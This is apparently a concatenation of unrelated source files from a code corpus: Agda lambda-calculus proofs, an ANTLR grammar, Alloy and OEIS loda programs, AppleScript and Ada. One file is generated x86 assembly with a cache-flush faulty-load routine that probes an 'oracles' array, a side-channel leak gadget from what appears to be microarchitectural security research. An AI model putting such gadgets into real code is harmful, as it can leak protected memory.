○ η) υ , u)) ⟦_⟧⬗Eq (M ∙ N) η υ = cong⟦∙⟧Eq idᵣ (⟦ M ⟧⬗Eq η υ) (⟦ M ⟧Un (cong⬗Un⋆ η υ)) (congaccUn η (⟦ M ⟧Un υ)) (⟦ N ⟧⬗Eq η υ) (⟦ N ⟧Un (cong⬗Un⋆ η υ)) (congaccUn η (⟦ N ⟧Un υ)) ⦙ acc⟦∙⟧idEq η (⟦ M ⟧Un υ) (congaccUn η (⟦ N ⟧Un υ)) ⦙ (cong⟦∙⟧Eq η ((lidaccEq (⟦ M ⟧Un υ)) ⁻¹) (⟦ M ⟧Un υ) (congaccUn idᵣ (⟦ M ⟧Un υ)) (reflEq (congaccUn η (⟦ N ⟧Un υ))) (congaccUn η (⟦ N ⟧Un υ)) (congaccUn η (⟦ N ⟧Un υ)) ⦙ acc⟦∙⟧Eq idᵣ η (⟦ M ⟧Un υ) (⟦ N ⟧Un υ)) -- ⟦_⟧⬗Eq⋆ = symEq ∘ ↑⟨_⟩Eq⋆⟦_⟧ₛ ⟦_⟧⬗Eq⋆ : ∀ {Γ Γ′ Ξ Φ} → {ρ : Γ ⊩⋆ Ξ} → (σ : Ξ ⊢⋆ Φ) (η : Γ′ ∋⋆ Γ) → Un⋆ ρ → Eq⋆ (⟦ σ ⟧⋆ (η ⬗ ρ)) (η ⬗ ⟦ σ ⟧⋆ ρ) ⟦_⟧⬗Eq⋆ ∅ η υ = ∅ ⟦_⟧⬗Eq⋆ (σ , M) η υ = ⟦ σ ⟧⬗Eq⋆ η υ , ⟦ M ⟧⬗Eq η υ -------------------------------------------------------------------------------- -- TODO: Generalise to zap⬖ postulate aux₄₈₁ : ∀ {Γ Ξ A} → {ρ : Γ ⊩⋆ Ξ} {a : Γ ⊩ A} → Un⋆ ρ → Eq⋆ ((ρ , a) ⬖ wkᵣ idᵣ) ρ -- TODO -- Basic properties of _◇_ -- Advanced properties of _◇_ -- Basic properties of _⬗_ -- Basic properties of _◆_ -- Advanced properties of _⬗_ -- Advanced properties of _◆_ -- TODO: Fix the instance argument problem; abstract over models; rename η to ξ… -------------------------------------------------------------------------------- renlift⟦_⟧Eq : ∀ {Γ Γ′ A B w w′} → {ρ : w ⊩⋆ Γ′} {a : w′ ⊩ A} → (M : Γ , A ⊢ B) (η₁ : Γ′ ∋⋆ Γ) (η₂ : w′ ∋⋆ w) → Un⋆ ρ → Un a → Eq (⟦ ren (liftᵣ {A} η₁) M ⟧ (η₂ ⬗ ρ , a)) (⟦ M ⟧ (η₂ ⬗ (ρ ⬖ η₁) , a)) renlift⟦_⟧Eq (𝓋 zero) η₁ η₂ υ u = reflEq u renlift⟦_⟧Eq {ρ = ρ} {a} (𝓋 (suc i)) η₁ η₂ υ u = ≡→Eq ((getᵥ (η₂ ⬗ ρ , a)) & natgetᵣ η₁ i) (conggetUn (getᵣ (wkᵣ η₁) i) (cong⬗Un⋆ η₂ υ , u)) ⦙ get⬖Eq η₁ (getᵣ η₁ i) i (cong⬗Un⋆ η₂ υ) ⁻¹ ⦙ conggetEq i (comp⬗⬖Eq⋆ η₂ η₁ υ ⁻¹) renlift⟦_⟧Eq (ƛ M) η₁ η₂ υ u = eq⊃ (λ η′ u′ → renlift⟦ M ⟧Eq (liftᵣ η₁) η′ (cong⬗Un⋆ η₂ υ , u) u′ ⦙ ⟦ M ⟧Eq ( ( cong⬗Eq⋆ η′ (( comp⬗⬖Eq⋆ η₂ η₁ υ ⦙ zap⬖Eq⋆ (wkᵣ η₁) η₁ (cong⬗Un⋆ η₂ υ) ⁻¹ ) ⁻¹) , reflEq (congaccUn η′ u) ) , reflEq u′ ) ((cong⬗Un⋆ η′ (cong⬖Un⋆ (wkᵣ η₁) (cong⬗Un⋆ η₂ υ , u)) , congaccUn η′ u) , u′) ((cong⬗Un⋆ η′ (cong⬗Un⋆ η₂ (cong⬖Un⋆ η₁ υ)) , congaccUn η′ u) , u′)) renlift⟦_⟧Eq (M ∙ N) η₁ η₂ υ u = cong⟦∙⟧Eq idᵣ (renlift⟦ M ⟧Eq η₁ η₂ υ u) (⟦ ren (liftᵣ η₁) M ⟧Un (cong⬗Un⋆ η₂ υ , u)) (⟦ M ⟧Un (cong⬗Un⋆ η₂ (cong⬖Un⋆ η₁ υ) , u)) (renlift⟦ N ⟧Eq η₁ η₂ υ u) (⟦ ren (liftᵣ η₁) N ⟧Un (cong⬗Un⋆ η₂ υ , u)) (⟦ N ⟧Un (cong⬗Un⋆ η₂ (cong⬖Un⋆ η₁ υ) , u)) -------------------------------------------------------------------------------- renwk⟦_⟧Eq : ∀ {Γ Γ′ A C w} → {ρ : w ⊩⋆ Γ′} {a : w ⊩ A} → (M : Γ ⊢ C) (η : Γ′ ∋⋆ Γ) → Un⋆ ρ → Un a → Eq (⟦ ren (wkᵣ {A} η) M ⟧ (ρ , a)) (⟦ M ⟧ (ρ ⬖ η)) renwk⟦_⟧Eq (𝓋 i) η υ u = get⬖Eq (wkᵣ η) (getᵣ (wkᵣ η) i) i (υ , u) ⁻¹ ⦙ conggetEq i (zap⬖Eq⋆ (wkᵣ η) η υ) renwk⟦_⟧Eq (ƛ M) η υ u = eq⊃ (λ η′ u′ → renlift⟦ M ⟧Eq (wkᵣ η) η′ (υ , u) u′ ⦙ ⟦ M ⟧Eq (cong⬗Eq⋆ η′ (zap⬖Eq⋆ (wkᵣ η) η υ) , reflEq u′) (cong⬗Un⋆ η′ (cong⬖Un⋆ (wkᵣ η) (υ , u)) , u′) (cong⬗Un⋆ η′ (cong⬖Un⋆ η υ) , u′)) renwk⟦_⟧Eq (M ∙ N) η υ u = cong⟦∙⟧Eq idᵣ (renwk⟦ M ⟧Eq η υ u) (⟦ ren (wkᵣ η) M ⟧Un (υ , u)) (⟦ M ⟧Un (cong⬖Un⋆ η υ)) (renwk⟦ N ⟧Eq η υ u) (⟦ ren (wkᵣ η) N ⟧Un (υ , u)) (⟦ N ⟧Un (cong⬖Un⋆ η υ)) -------------------------------------------------------------------------------- wk⟦_⟧Eq : ∀ {Γ A C w} → {ρ : w ⊩⋆ Γ} {a : w ⊩ A} → (M : Γ ⊢ C) → Un⋆ ρ → Un a → Eq (⟦ wk {A} M ⟧ (ρ , a)) (⟦ M ⟧ ρ) wk⟦_⟧Eq M υ u = renwk⟦ M ⟧Eq idᵣ υ u ⦙ ⟦ M ⟧Eq (rid⬖Eq⋆ υ) (cong⬖Un⋆ idᵣ υ) υ wk⟦_⟧Eq⋆ : ∀ {Γ Ξ A w} → {ρ : w ⊩⋆ Γ} {a : w ⊩ A} → (σ : Γ ⊢⋆ Ξ) → Un⋆ ρ → Un a → Eq⋆ (⟦ wkₛ {A} σ ⟧⋆ (ρ , a)) (⟦ σ ⟧⋆ ρ) wk⟦_⟧Eq⋆ ∅ υ u = ∅ wk⟦_⟧Eq⋆ (σ , M) υ u = wk⟦ σ ⟧Eq⋆ υ u , wk⟦ M ⟧Eq υ u -------------------------------------------------------------------------------- get⟦_⟧Eq : ∀ {Γ Ξ A w} → {ρ : w ⊩⋆ Γ} → (σ : Γ ⊢⋆ Ξ) (i : Ξ ∋ A) → Un⋆ ρ → Eq (⟦ getₛ σ i ⟧ ρ) (getᵥ (⟦ σ ⟧⋆ ρ) i) get⟦_⟧Eq (σ , M) zero υ = reflEq (⟦ M ⟧Un υ) get⟦_⟧Eq (σ , M) (suc i) υ = get⟦ σ ⟧Eq i υ -------------------------------------------------------------------------------- sublift⟦_⟧Eq : ∀ {Γ Ξ A B w} → {ρ : w ⊩⋆ Γ} {a : w ⊩ A} → (M : Ξ , A ⊢ B) (σ : Γ ⊢⋆ Ξ) → Un⋆ ρ → Un a → Eq (⟦ sub (liftₛ {A} σ) M ⟧ (ρ , a)) (⟦ M ⟧ (⟦ σ ⟧⋆ ρ , a)) sublift⟦_⟧Eq (𝓋 zero) σ υ u = reflEq u sublift⟦_⟧Eq {ρ = ρ} {a} (𝓋 (suc i)) σ υ u = ≡→Eq ((λ M′ → ⟦ M′ ⟧ (ρ , a)) & natgetₛ σ i) (⟦ getₛ (wkₛ σ) i ⟧Un (υ , u)) ⦙ wk⟦ getₛ σ i ⟧Eq υ u ⦙ get⟦ σ ⟧Eq i υ sublift⟦_⟧Eq (ƛ M) σ υ u = eq⊃ (λ η′ u′ → sublift⟦ M ⟧Eq (liftₛ σ) (cong⬗Un⋆ η′ υ , congaccUn η′ u) u′ ⦙ ⟦ M ⟧Eq ((⟦ wkₛ σ ⟧⬗Eq⋆ η′ (υ , u) , reflEq (congaccUn η′ u)) , reflEq u′) ((⟦ wkₛ σ ⟧Un⋆ (cong⬗Un⋆ η′ υ , congaccUn η′ u) , congaccUn η′ u) , u′) ((cong⬗Un⋆ η′ (⟦ wkₛ σ ⟧Un⋆ (υ , u)) , congaccUn η′ u) , u′) ⦙ ⟦ M ⟧Eq ((cong⬗Eq⋆ η′ (wk⟦ σ ⟧Eq⋆ υ u) , reflEq (congaccUn η′ u)) , reflEq u′) ((cong⬗Un⋆ η′ (⟦ wkₛ σ ⟧Un⋆ (υ , u)) , congaccUn η′ u) , u′) ((cong⬗Un⋆ η′ (⟦ σ ⟧Un⋆ υ) , congaccUn η′ u) , u′)) sublift⟦_⟧Eq (M ∙ N) σ υ u = cong⟦∙⟧Eq idᵣ (sublift⟦ M ⟧Eq σ υ u) (⟦ sub (liftₛ σ) M ⟧Un (υ , u)) (⟦ M ⟧Un (⟦ σ ⟧Un⋆ υ , u)) (sublift⟦ N ⟧Eq σ υ u) (⟦ sub (liftₛ σ) N ⟧Un (υ , u)) (⟦ N ⟧Un (⟦ σ ⟧Un⋆ υ , u)) -------------------------------------------------------------------------------- subliftwk⟦_⟧Eq : ∀ {Γ Ξ A A′ B w w′} → {ρ : w ⊩⋆ Γ} {a : w ⊩ A} {a′ : w′ ⊩ A′} → (M : Ξ , A′ ⊢ B) (σ : Γ ⊢⋆ Ξ) (η : w′ ∋⋆ w) → Un⋆ ρ → Un a → Un a′ → Eq (⟦ sub (liftₛ (wkₛ σ)) M ⟧ (η ⬗ ρ , acc η a , a′)) (⟦ sub (liftₛ σ) M ⟧ (η ⬗ ρ , a′)) subliftwk⟦_⟧Eq M σ η υ u u′ = sublift⟦ M ⟧Eq (wkₛ σ) (cong⬗Un⋆ η υ , congaccUn η u) u′ ⦙ ⟦ M ⟧Eq (wk⟦ σ ⟧Eq⋆ (cong⬗Un⋆ η υ) (congaccUn η u) , reflEq u′) (⟦ wkₛ σ ⟧Un⋆ (cong⬗Un⋆ η υ , congaccUn η u) , u′) (⟦ σ ⟧Un⋆ (cong⬗Un⋆ η υ) , u′) ⦙ sublift⟦ M ⟧Eq σ (cong⬗Un⋆ η υ) u′ ⁻¹ -------------------------------------------------------------------------------- subwk⟦_⟧Eq : ∀ {Γ Ξ A C w} → {ρ : w ⊩⋆ Γ} {a : w ⊩ A} → (M : Ξ ⊢ C) (σ : Γ ⊢⋆ Ξ) → Un⋆ ρ → Un a → Eq (⟦ sub (wkₛ {A} σ) M ⟧ (ρ , a)) (⟦ sub σ M ⟧ ρ) subwk⟦_⟧Eq {ρ = ρ} {a} (𝓋 i) σ υ u = ≡→Eq ((λ M′ → ⟦ M′ ⟧ (ρ , a)) & (natgetₛ σ i)) (⟦ getₛ (wkₛ σ) i ⟧Un (υ , u)) ⦙ wk⟦ getₛ σ i ⟧Eq υ u subwk⟦_⟧Eq (ƛ {A = A′} M) σ υ u = eq⊃ (λ η u′ → subliftwk⟦ M ⟧Eq σ η υ u u′) subwk⟦_⟧Eq (M ∙ N) σ υ u = cong⟦∙⟧Eq idᵣ (subwk⟦ M ⟧Eq σ υ u) (⟦ sub (wkₛ σ) M ⟧Un (υ , u)) (⟦ sub σ M ⟧Un υ) (subwk⟦ N ⟧Eq σ υ u) (⟦ sub (wkₛ σ) N ⟧Un (υ , u)) (⟦ sub σ N ⟧Un υ) -------------------------------------------------------------------------------- sub⟦_⟧Eq : ∀ {Γ Ξ A w} → {ρ : w ⊩⋆ Γ} → (M : Ξ ⊢ A) (σ : Γ ⊢⋆ Ξ) → Un⋆ ρ → Eq (⟦ sub σ M ⟧ ρ) (⟦ M ⟧ (⟦ σ ⟧⋆ ρ)) sub⟦_⟧Eq (𝓋 i) σ υ = get⟦ σ ⟧Eq i υ sub⟦_⟧Eq (ƛ M) σ υ = eq⊃ (λ η u → sublift⟦ M ⟧Eq σ (cong⬗Un⋆ η υ) u ⦙ ⟦ M ⟧Eq (⟦ σ ⟧⬗Eq⋆ η υ , reflEq u) (⟦ σ ⟧Un⋆ (cong⬗Un⋆ η υ) , u) (cong⬗Un⋆ η (⟦ σ ⟧Un⋆ υ) , u)) sub⟦_⟧Eq (M ∙ N) σ υ = cong⟦∙⟧Eq idᵣ (sub⟦ M ⟧Eq σ υ) (⟦ sub σ M ⟧Un υ) (⟦ M ⟧Un (⟦ σ ⟧Un⋆ υ)) (sub⟦ N ⟧Eq σ υ) (⟦ sub σ N ⟧Un υ) (⟦ N ⟧Un (⟦ σ ⟧Un⋆ υ)) -------------------------------------------------------------------------------- -- TODO: Rename this sublift⟦⟧Eq⁈ : ∀ {Γ Ξ A B w} → {ρ : w ⊩⋆ Γ} → (σ : Γ ⊢⋆ Ξ) (M : Ξ , A ⊢ B) (N : Γ ⊢ A) → Un⋆ ρ → Eq (⟦ sub (liftₛ {A} σ) M ⟧ (ρ , ⟦ N ⟧ ρ)) (⟦ sub (σ , N) M ⟧ ρ) sublift⟦⟧Eq⁈ {ρ = ρ} σ M N υ = sublift⟦ M ⟧Eq σ υ (⟦ N ⟧Un υ) ⦙ sub⟦ M ⟧Eq (σ , N) υ ⁻¹ -------------------------------------------------------------------------------- -- TODO: Generalise theorem 4 over models module _ where open 𝔐 canon mutual lemƛ : ∀ {Γ A B w} → {ρ : w ⊩⋆ Γ} {M M′ : Γ , A ⊢ B} → M ∼ M′ → Un⋆ ρ → Eq (⟦ ƛ M ⟧ ρ) (⟦ ƛ M′ ⟧ ρ) lemƛ p υ = eq⊃ (λ xs u → cong⟦ p ⟧Eq (cong⬗Un⋆ xs υ , u)) lem∙ : ∀ {Γ A B w} → {ρ : w ⊩⋆ Γ} {M M′ : Γ ⊢ A ⇒ B} {N N′ : Γ ⊢ A} → M ∼ M′ → N ∼ N′ → Un⋆ ρ → Eq (⟦ M ∙ N ⟧ ρ) (⟦ M′ ∙ N′ ⟧ ρ) lem∙ {M = M} {M′} {N} {N′} p q υ = cong⟦∙⟧Eq idᵣ (cong⟦ p ⟧Eq υ) (⟦ M ⟧Un υ) (⟦ M′ ⟧Un υ) (cong⟦ q ⟧Eq υ) (⟦ N ⟧Un υ) (⟦ N′ ⟧Un υ) lemred⇒ : ∀ {Γ Ξ A B w} → {ρ : w ⊩⋆ Γ} → (σ : Γ ⊢⋆ Ξ) (M : Ξ , A ⊢ B) (N : Γ ⊢ A) → Un⋆ ρ → Eq (⟦ sub σ (ƛ M) ∙ N ⟧ ρ) (⟦ sub (σ , N) M ⟧ ρ) lemred⇒ {ρ = ρ} σ M N υ = ⟦ sub (liftₛ σ) M ⟧Eq (lid⬗Eq⋆ υ , reflEq (⟦ N ⟧Un υ)) (cong⬗Un⋆ idᵣ υ , ⟦ N ⟧Un υ) (υ , ⟦ N ⟧Un υ) ⦙ sublift⟦⟧Eq⁈ σ M N υ lemexp⇒ : ∀ {Γ A B w} → {ρ : w ⊩⋆ Γ} → (M : Γ ⊢ A ⇒ B) → Un⋆ ρ → Eq (⟦ M ⟧ ρ) (⟦ ƛ (wk M ∙ 0) ⟧ ρ) lemexp⇒ {ρ = ρ} M υ = eq⊃ (λ η {a} u → acc⟦∙⟧idEq η (⟦ M ⟧Un υ) u ⁻¹ ⦙ cong⟦∙⟧Eq idᵣ (⟦ M ⟧⬗Eq η υ ⁻¹) (congaccUn η (⟦ M ⟧Un υ)) (⟦ M ⟧Un (cong⬗Un⋆ η υ)) (reflEq u) u u ⦙ cong⟦∙⟧Eq idᵣ (wk⟦ M ⟧Eq (cong⬗Un⋆ η υ) u ⁻¹) (⟦ M ⟧Un (cong⬗Un⋆ η υ)) (⟦ wk M ⟧Un (cong⬗Un⋆ η υ , u)) (reflEq u) u u) -- Theorem 4. cong⟦_⟧Eq : ∀ {Γ A w} → {M M′ : Γ ⊢ A} {ρ : w ⊩⋆ Γ} → M ∼ M′ → Un⋆ ρ → Eq (⟦ M ⟧ ρ) (⟦ M′ ⟧ ρ) cong⟦ refl∼ {M = M} ⟧Eq υ = reflEq (⟦ M ⟧Un υ) cong⟦ p ⁻¹∼ ⟧Eq υ = cong⟦ p ⟧Eq υ ⁻¹ cong⟦ p ⦙∼ q ⟧Eq υ = cong⟦ p ⟧Eq υ ⦙ cong⟦ q ⟧Eq υ cong⟦ ƛ∼ p ⟧Eq υ = lemƛ p υ cong⟦ p ∙∼ q ⟧Eq υ = lem∙ p q υ cong⟦ red⇒ σ M N ⟧Eq υ = lemred⇒ σ M N υ cong⟦ exp⇒ M ⟧Eq υ = lemexp⇒ M υ -------------------------------------------------------------------------------- -- Theorem 5. thm₅ : ∀ {Γ A} → (M M′ : Γ ⊢ A) → nf M ≡ nf M′ → M ∼ M′ thm₅ M M′ p = thm₂ M ⦙ ≡→∼ p ⦙ (thm₂ M′ ⁻¹) -------------------------------------------------------------------------------- -- proj⟨_⟩𝒰⋆ ⌊_⌋ᵤ : ∀ {Γ Γ′} → (η : Γ′ ∋⋆ Γ) → Un⋆ ⌊ η ⌋ᵥ ⌊ ∅ ⌋ᵤ = ∅ ⌊ η , i ⌋ᵤ = ⌊ η ⌋ᵤ , ⟪𝓋 i ⟫ᵤ -- refl𝒰⋆ idᵤ : ∀ {Γ} → Un⋆ (idᵥ {Γ}) idᵤ = ⌊ idᵣ ⌋ᵤ -- Theorem 6. thm₆ : ∀ {Γ A} → (M M′ : Γ ⊢ A) → M ∼ M′ → nf M ≡ nf M′ thm₆ M M′ p = cor₁ M M′ (cong⟦ p ⟧Eq idᵤ) --------------------------------------------------------------------------------

dev/smack/Smack.g4

bvellacott/smack-js-compiler

0

3293

//Copyright (c) 2015 <NAME> // //Permission is hereby granted, free of charge, to any person obtaining a copy of //this software and associated documentation files (the "Software"), to deal in //the Software without restriction, including without limitation the rights to //use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies //of the Software, and to permit persons to whom the Software is furnished to do //so, subject to the following conditions: // //The above copyright notice and this permission notice shall be included in all //copies or substantial portions of the Software. // //THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR //IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, //FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE //AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER //LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, //OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE //SOFTWARE. // This is the grammar used to generate the select lexer and parser using the // antlr4 tool grammar Smack; import Json; smkFile : funcDecl* ; packageDecl : 'pack' dottedId ';' ; varAssign : jsonPath '=' expression ; funcDecl : 'func' Id '(' Id? (',' Id)* ')' codeBlock ; funcInvoke : dottedId '(' resolvable? (',' resolvable)* ')' ; jsonPath : Id (keyRef)* ; dottedId : Id ('.' Id)* ; keyRef : '[' resolvable ']' ; retStatement : 'ret' expression ; ifStat : 'if' '(' expression ')' codeBlock elseIfStat* elseStat? ; elseIfStat : 'else' 'if' '(' expression ')' codeBlock ; elseStat : 'else' codeBlock ; loop : 'while' '(' expression ')' codeBlock ; expression : '(' expression ')' # parenExpr | <assoc=right> expression Pow expression # powExpr | expression Mul expression # mulExpr | expression Div expression # divExpr | expression Mod expression # modExpr | expression (Plus | Minus)+ expression # sumExpr | Minus expression # signedExpr | Not expression # notExpr | expression Eq expression # eqExpr | expression Neq expression # neqExpr | expression Lt expression # ltExpr | expression Le expression # leExpr | expression Gt expression # gtExpr | expression Ge expression # geExpr | expression And expression # andExpr | expression Or expression # orExpr | resolvable # atomExpr ; resolvable : value | jsonPath | funcInvoke ; codeBlock : '{' sentence* '}' ; sentence : statement ';' | loop | ifStat // | comment ; statement : varAssign | funcInvoke | retStatement ; Pow : '^' ; Mul : '*' ; Div : '/' ; Mod : '%' ; Plus : '+' ; Minus : '-' ; Not : '!' ; Eq : '==' ; Neq : '!=' ; Lt : '<' ; Le : '<=' ; Gt : '>' ; Ge : '>=' ; And : '&&' ; Or : '||' ; Id : [$a-zA-Z_]+[$a-zA-Z_0-9]* ; // Whitespace and comments are ignored Comment : '//' ~('\n')* '\n' -> skip ; WS : [ \t\r\n]+ -> skip ;

alloy4fun_models/trashltl/models/13/KvuCtBNYAMscB3zuL.als

Kaixi26/org.alloytools.alloy

0

4146

open main pred idKvuCtBNYAMscB3zuL_prop14 { all f : File | (f in Trash and f in Protected) implies f not in Protected' } pred __repair { idKvuCtBNYAMscB3zuL_prop14 } check __repair { idKvuCtBNYAMscB3zuL_prop14 <=> prop14o }

Transynther/x86/_processed/NONE/_zr_/i9-9900K_12_0xa0_notsx.log_5_1652.asm

ljhsiun2/medusa

9

95967

<reponame>ljhsiun2/medusa<filename>Transynther/x86/_processed/NONE/_zr_/i9-9900K_12_0xa0_notsx.log_5_1652.asm .global s_prepare_buffers s_prepare_buffers: push %r10 push %r12 push %r13 push %r9 push %rax push %rbp push %rcx push %rdi push %rsi lea addresses_WT_ht+0x1ee77, %rax nop nop nop nop add %r13, %r13 mov $0x6162636465666768, %r10 movq %r10, (%rax) nop nop dec %rax lea addresses_A_ht+0x40f1, %rsi nop nop nop nop xor %r12, %r12 movups (%rsi), %xmm2 vpextrq $1, %xmm2, %rbp nop nop nop nop cmp %rsi, %rsi lea addresses_WT_ht+0x3277, %rsi nop nop nop sub %r9, %r9 movups (%rsi), %xmm1 vpextrq $1, %xmm1, %rbp nop sub %r9, %r9 lea addresses_WT_ht+0xc38b, %rsi nop nop nop nop dec %r10 movb $0x61, (%rsi) nop nop nop cmp %r13, %r13 lea addresses_WC_ht+0xdf97, %rsi lea addresses_UC_ht+0x13917, %rdi nop dec %rbp mov $18, %rcx rep movsl nop nop nop nop inc %rcx lea addresses_UC_ht+0x10ed8, %rsi lea addresses_A_ht+0xb93, %rdi cmp $38379, %r12 mov $50, %rcx rep movsb nop nop nop nop and $49707, %r13 lea addresses_WC_ht+0x1cd77, %rsi lea addresses_A_ht+0x16c57, %rdi nop nop nop nop nop sub %rbp, %rbp mov $105, %rcx rep movsl nop nop add $48370, %r12 lea addresses_WT_ht+0x16b7, %rdi nop nop cmp %rsi, %rsi mov (%rdi), %cx nop nop nop nop and $8427, %r12 lea addresses_UC_ht+0xa73f, %rcx nop nop nop nop nop and %r12, %r12 movb $0x61, (%rcx) nop nop dec %rdi lea addresses_normal_ht+0x191df, %rsi and $34761, %r12 vmovups (%rsi), %ymm6 vextracti128 $1, %ymm6, %xmm6 vpextrq $1, %xmm6, %rbp nop nop nop inc %rdi lea addresses_normal_ht+0x1a8e7, %rsi lea addresses_A_ht+0xd07f, %rdi nop nop nop dec %r13 mov $42, %rcx rep movsw nop nop nop nop xor $35040, %r12 pop %rsi pop %rdi pop %rcx pop %rbp pop %rax pop %r9 pop %r13 pop %r12 pop %r10 ret .global s_faulty_load s_faulty_load: push %r10 push %r12 push %r8 push %rax push %rbx push %rcx push %rdi // Load mov $0x2696c0000000ce7, %r8 clflush (%r8) nop dec %rax mov (%r8), %r12 nop nop sub $21231, %r12 // Load lea addresses_WT+0xe977, %rax clflush (%rax) nop sub $59191, %rbx mov (%rax), %r8w nop nop nop nop add %rax, %rax // Faulty Load lea addresses_A+0x2077, %rax nop nop inc %r10 mov (%rax), %cx lea oracles, %r8 and $0xff, %rcx shlq $12, %rcx mov (%r8,%rcx,1), %rcx pop %rdi pop %rcx pop %rbx pop %rax pop %r8 pop %r12 pop %r10 ret /* <gen_faulty_load> [REF] {'src': {'type': 'addresses_A', 'AVXalign': False, 'size': 2, 'NT': False, 'same': False, 'congruent': 0}, 'OP': 'LOAD'} {'src': {'type': 'addresses_NC', 'AVXalign': False, 'size': 8, 'NT': False, 'same': False, 'congruent': 4}, 'OP': 'LOAD'} {'src': {'type': 'addresses_WT', 'AVXalign': False, 'size': 2, 'NT': False, 'same': False, 'congruent': 8}, 'OP': 'LOAD'} [Faulty Load] {'src': {'type': 'addresses_A', 'AVXalign': False, 'size': 2, 'NT': False, 'same': True, 'congruent': 0}, 'OP': 'LOAD'} <gen_prepare_buffer> {'OP': 'STOR', 'dst': {'type': 'addresses_WT_ht', 'AVXalign': False, 'size': 8, 'NT': False, 'same': False, 'congruent': 9}} {'src': {'type': 'addresses_A_ht', 'AVXalign': False, 'size': 16, 'NT': False, 'same': False, 'congruent': 1}, 'OP': 'LOAD'} {'src': {'type': 'addresses_WT_ht', 'AVXalign': False, 'size': 16, 'NT': False, 'same': False, 'congruent': 8}, 'OP': 'LOAD'} {'OP': 'STOR', 'dst': {'type': 'addresses_WT_ht', 'AVXalign': False, 'size': 1, 'NT': False, 'same': False, 'congruent': 1}} {'src': {'type': 'addresses_WC_ht', 'congruent': 5, 'same': False}, 'OP': 'REPM', 'dst': {'type': 'addresses_UC_ht', 'congruent': 4, 'same': False}} {'src': {'type': 'addresses_UC_ht', 'congruent': 0, 'same': False}, 'OP': 'REPM', 'dst': {'type': 'addresses_A_ht', 'congruent': 0, 'same': False}} {'src': {'type': 'addresses_WC_ht', 'congruent': 8, 'same': False}, 'OP': 'REPM', 'dst': {'type': 'addresses_A_ht', 'congruent': 5, 'same': False}} {'src': {'type': 'addresses_WT_ht', 'AVXalign': False, 'size': 2, 'NT': False, 'same': False, 'congruent': 5}, 'OP': 'LOAD'} {'OP': 'STOR', 'dst': {'type': 'addresses_UC_ht', 'AVXalign': True, 'size': 1, 'NT': False, 'same': False, 'congruent': 3}} {'src': {'type': 'addresses_normal_ht', 'AVXalign': False, 'size': 32, 'NT': False, 'same': False, 'congruent': 1}, 'OP': 'LOAD'} {'src': {'type': 'addresses_normal_ht', 'congruent': 2, 'same': False}, 'OP': 'REPM', 'dst': {'type': 'addresses_A_ht', 'congruent': 2, 'same': False}} {'00': 5} 00 00 00 00 00 */

oeis/315/A315689.asm

neoneye/loda-programs

11

168460

<reponame>neoneye/loda-programs ; A315689: Coordination sequence Gal.6.624.6 where G.u.t.v denotes the coordination sequence for a vertex of type v in tiling number t in the Galebach list of u-uniform tilings. ; Submitted by <NAME> ; 1,6,12,17,22,28,33,38,44,49,54,60,66,72,78,83,88,94,99,104,110,115,120,126,132,138,144,149,154,160,165,170,176,181,186,192,198,204,210,215,220,226,231,236,242,247,252,258,264,270 mov $2,$0 seq $0,315395 ; Coordination sequence Gal.6.120.6 where G.u.t.v denotes the coordination sequence for a vertex of type v in tiling number t in the Galebach list of u-uniform tilings. sub $0,5 add $3,$0 div $3,3 mov $0,$3 add $0,2 mov $4,$2 mul $4,4 add $0,$4

node_modules/appium/node_modules/appium-ios-driver/osa/Rotate.applescript

migueref/educational-app

145

4714

<reponame>migueref/educational-app<filename>node_modules/appium/node_modules/appium-ios-driver/osa/Rotate.applescript on run argv set image_file to item 1 of argv set rotate_value to item 2 of argv tell application "Image Events" try set rotate_file to open image_file rotate rotate_file to angle rotate_value save rotate_file close rotate_file end try end tell end run

Task/Abstract-type/Ada/abstract-type-3.ada

LaudateCorpus1/RosettaCodeData

1

10056

with Ada.Finalization; ... type Node is abstract new Ada.Finalization.Limited_Controlled and Queue with record Previous : not null access Node'Class := Node'Unchecked_Access; Next : not null access Node'Class := Node'Unchecked_Access; end record; overriding procedure Finalize (X : in out Node); -- Removes the node from its list if any overriding procedure Dequeue (Lounge : in out Node; Item : in out Element); overriding procedure Enqueue (Lounge : in out Node; Item : in out Element); procedure Process (X : in out Node) is abstract; -- To be implemented

oeis/290/A290112.asm

neoneye/loda-programs

11

240305

; A290112: Binary representation of the diagonal from the origin to the corner of the n-th stage of growth of the two-dimensional cellular automaton defined by "Rule 643", based on the 5-celled von Neumann neighborhood. ; Submitted by <NAME> ; 1,11,101,1011,10111,101111,1011111,10111111,101111111,1011111111,10111111111,101111111111,1011111111111,10111111111111,101111111111111,1011111111111111,10111111111111111,101111111111111111,1011111111111111111,10111111111111111111,101111111111111111111,1011111111111111111111,10111111111111111111111,101111111111111111111111,1011111111111111111111111,10111111111111111111111111,101111111111111111111111111,1011111111111111111111111111,10111111111111111111111111111,101111111111111111111111111111 lpb $0 mov $3,$0 cmp $3,0 add $0,$3 sub $0,1 mov $2,$0 mov $0,0 seq $2,267623 ; Binary representation of the middle column of the "Rule 187" elementary cellular automaton starting with a single ON (black) cell. lpe mov $0,$2 mul $0,10 add $0,1

agda/Categories/Product.agda

oisdk/combinatorics-paper

4

1098

